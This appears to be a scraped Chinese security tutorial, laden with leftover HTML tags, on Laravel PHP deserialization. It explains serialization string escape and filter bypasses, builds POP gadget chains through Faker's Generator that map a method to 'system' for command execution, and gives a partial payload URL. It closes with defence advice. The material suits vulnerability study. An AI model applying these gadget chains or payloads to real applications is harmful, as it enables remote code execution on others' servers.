Laravel反序列化漏洞分析与POP链挖掘技术详解<\/h1>

一、基础概念与技术要点<\/h2>

1. PHP序列化属性差异<\/h3>

PHP中不同可见性属性的序列化表现：<\/p>

Public属性<\/strong>：直接显示属性名
O<\/span>:<\/span>4<\/span>:<\/span>"test"<\/span>:<\/span>1<\/span>:<\/span>{s<\/span>:<\/span>5<\/span>:<\/span>"test1"<\/span>;s<\/span>:<\/span>3<\/span>:<\/span>"aaa"<\/span>;} <\/span><\/span><\/code><\/pre><\/li> Protected属性<\/strong>：显示为%00*%00属性名<\/code>（长度增加6） s<\/span>:<\/span>8<\/span>:<\/span>"*test2"<\/span>;s<\/span>:<\/span>3<\/span>:<\/span>"aaa"<\/span>; <\/span><\/span><\/code><\/pre><\/li> Private属性<\/strong>：显示为%00类名%00属性名<\/code>（长度增加3+类名长度） s<\/span>:<\/span>11<\/span>:<\/span>"testtest3"<\/span>;s<\/span>:<\/span>3<\/span>:<\/span>"aaa"<\/span>; <\/span><\/span><\/code><\/pre><\/li> <\/ul> 2. PHP反序列化字符逃逸<\/h3> 常见于替换操作导致的字符长度变化：<\/p> function<\/span> read<\/span>($data) { <\/span><\/span> $data =<\/span> str_replace<\/span>('?'<\/span>, chr<\/span>(0<\/span>).<\/span>"*"<\/span>.<\/span>chr<\/span>(0<\/span>), $data); \/\/ 1字符变3字符 <\/span><\/span><\/span><\/span> return<\/span> $data; <\/span><\/span>} <\/span><\/span> <\/span><\/span>function<\/span> write<\/span>($data) { <\/span><\/span> $data =<\/span> str_replace<\/span>(chr<\/span>(0<\/span>).<\/span>"*"<\/span>.<\/span>chr<\/span>(0<\/span>), '?'<\/span>, $data); \/\/ 3字符变1字符 <\/span><\/span><\/span><\/span> return<\/span> $data; <\/span><\/span>} <\/span><\/span><\/code><\/pre>逃逸原理<\/strong>：<\/p> 通过构造特定数量的?<\/code>使序列化字符串解析错位<\/li> 利用长度计算差异将恶意payload逃逸出字符串范围<\/li> <\/ol> 3. 常见绕过技术<\/h3> 关键字检测绕过<\/strong>：<\/p> \/\/ 原始检测 <\/span><\/span><\/span><\/span>if<\/span>(stristr<\/span>($data, 'name'<\/span>) !==<\/span> false<\/span>) { die<\/span>("Name Pass<\/span>\n<\/span>"<\/span>); } <\/span><\/span> <\/span><\/span>\/\/ 绕过方法：使用十六进制表示 <\/span><\/span><\/span><\/span>\6e\61\6d\65<\/span> \/\/ 对应"name" <\/span><\/span><\/span><\/code><\/pre><\/li> __wakeup()绕过<\/strong>：当序列化字符串中对象属性个数大于实际属性个数时，会跳过__wakeup()<\/code>执行<\/p> O<\/span>:<\/span>4<\/span>:<\/span>"test"<\/span>:<\/span>2<\/span>:<\/span>{...<\/span>} \/\/ 实际只有1个属性 <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ul> 二、Laravel反序列化漏洞分析<\/h2> 1. 漏洞入口点<\/h3> app\/Http\/Controllers\/DController.php<\/code>中的反序列化操作<\/p> 2. 关键POP链构造<\/h3> 链1：通过PendingResourceRegistration触发<\/h4> namespace<\/span> Illuminate\Routing<\/span>; <\/span><\/span>class<\/span> PendingResourceRegistration<\/span> { <\/span><\/span> protected<\/span> $registrar; <\/span><\/span> protected<\/span> $name =<\/span> "admi<\/span>\6<\/span>e"<\/span>; \/\/ 绕过admin检测 <\/span><\/span><\/span><\/span> protected<\/span> $controller =<\/span> '恶意命令'<\/span>; <\/span><\/span> <\/span><\/span> public<\/span> function<\/span> __destruct() { <\/span><\/span> if<\/span>($this-><\/span>name<\/span>=<\/span>'admin'<\/span>){ <\/span><\/span> $this-><\/span>registrar<\/span>-><\/span>edit<\/span>($this-><\/span>controller<\/span>); \/\/ 触发__call <\/span><\/span><\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>配合Faker组件的Generator类：<\/p> namespace<\/span> Faker<\/span>; <\/span><\/span>class<\/span> Generator<\/span> { <\/span><\/span> protected<\/span> $formatters =<\/span> array<\/span>('edit'<\/span>=><\/span>'system'<\/span>); <\/span><\/span> \/\/ 触发链： <\/span><\/span><\/span><\/span> \/\/ __call() -> format() -> getFormatter() -> ValidGenerator->format() <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>链2：通过ImportConfigurator触发<\/h4> namespace<\/span> Symfony\Component\Routing\Loader\Configurator<\/span>; <\/span><\/span>class<\/span> ImportConfigurator<\/span> { <\/span><\/span> private<\/span> $parent; <\/span><\/span> public<\/span> function<\/span> __destruct() { <\/span><\/span> $this-><\/span>parent<\/span>-><\/span>addCollection<\/span>($this-><\/span>route<\/span>); \/\/ 触发__call <\/span><\/span><\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>3. 最终利用链<\/h3> 通过__destruct<\/code>或__wakeup<\/code>触发初始调用<\/li> 调用不存在的方法触发__call<\/code><\/li> 经过Faker组件的format<\/code>方法<\/li> 到达ValidGenerator::format()<\/code>中的call_user_func_array<\/code><\/li> <\/ol> \/\/ 最终执行点 <\/span><\/span><\/span><\/span>public<\/span> function<\/span> format<\/span>($formatter, $arguments =<\/span> array<\/span>()) { <\/span><\/span> return<\/span> call_user_func_array<\/span>($formatter, $arguments); <\/span><\/span>} <\/span><\/span><\/code><\/pre>三、高级POP链挖掘技术<\/h2> 1. 原生POP链挖掘方法<\/h3> 挖掘步骤<\/strong>：<\/p> 从常见起点开始（__destruct<\/code>, __wakeup<\/code>）<\/li> 分析每个方法的调用链<\/li> 寻找最终可控制的危险函数调用（如call_user_func<\/code>）<\/li> <\/ol> 示例链<\/strong>：<\/p> ImportConfigurator<\/span>::<\/span>__destruct<\/span>() <\/span><\/span>-><\/span> QueueManager<\/span>::<\/span>addCollection<\/span>() \/\/ 触发__call <\/span><\/span><\/span><\/span>-><\/span> Generator<\/span>::<\/span>__call<\/span>() <\/span><\/span>-><\/span> Generator<\/span>::<\/span>format<\/span>() <\/span><\/span>-><\/span> Generator<\/span>::<\/span>getFormatter<\/span>() <\/span><\/span>-><\/span> ValidGenerator<\/span>::<\/span>format<\/span>() \/\/ 执行call_user_func_array <\/span><\/span><\/span><\/code><\/pre>2. 参数控制技巧<\/h3> 通过QueueManager控制参数：<\/p> namespace<\/span> Illuminate\Queue<\/span>; <\/span><\/span>class<\/span> QueueManager<\/span> { <\/span><\/span> protected<\/span> $app =<\/span> [ <\/span><\/span> 'config'<\/span> =><\/span> [ <\/span><\/span> 'queue.connections.qing'<\/span> =><\/span> ['driver'<\/span>=><\/span>'qing'<\/span>] <\/span><\/span> ] <\/span><\/span> ]; <\/span><\/span> protected<\/span> $connectors =<\/span> [ <\/span><\/span> 'qing'<\/span> =><\/span> [$callbackObj, 'method'<\/span>] <\/span><\/span> ]; <\/span><\/span>} <\/span><\/span><\/code><\/pre>3. 回调函数控制<\/h3> 使用Whoops组件的CallbackHandler实现参数控制：<\/p> namespace<\/span> Whoops\Handler<\/span>; <\/span><\/span>class<\/span> CallbackHandler<\/span> { <\/span><\/span> public<\/span> function<\/span> handle<\/span>() { <\/span><\/span> $callable($exception, $inspector, $run); \/\/ 可控制第一个参数 <\/span><\/span><\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>四、完整利用Payload构造<\/h2> 1. 字符逃逸处理<\/h3> 计算需要插入的?<\/code>数量：<\/p> 确定要逃逸的payload长度<\/li> 计算每个?<\/code>可产生的额外空间（1变3，多2字符）<\/li> 构造合适数量的?<\/code>使payload能完整逃逸<\/li> <\/ol> 2. 示例Payload<\/h3> http<\/span>:\/\/<\/span>example<\/span>.<\/span>com<\/span>\/<\/span>task<\/span>?<\/span>task<\/span>=????????...?<\/span>";s:5:"<\/span>qingx<\/span>";O:46:"<\/span>Illuminate\Routing\PendingResourceRegistration<\/span>":4:{...} <\/span><\/span><\/span><\/code><\/pre>3. 私有属性处理<\/h3> 在序列化字符串中：<\/p> 将%00<\/code>替换为\0<\/code><\/li> 确保长度计算准确<\/li> <\/ul> 五、防御建议<\/h2> 避免反序列化用户输入<\/li> 使用签名验证序列化数据<\/li> 及时更新框架版本<\/li> 限制危险函数的使用<\/li> 对反序列化操作进行严格的类型检查<\/li> <\/ol> 六、参考资源<\/h2> PHP反序列化字符逃逸详解<\/a><\/li> Laravel反序列化漏洞分析<\/a><\/li> POP链构造技巧<\/a><\/li> <\/ol> 通过深入理解这些技术原理和构造方法，安全研究人员可以更有效地挖掘和防御Laravel应用中的反序列化漏洞。<\/p>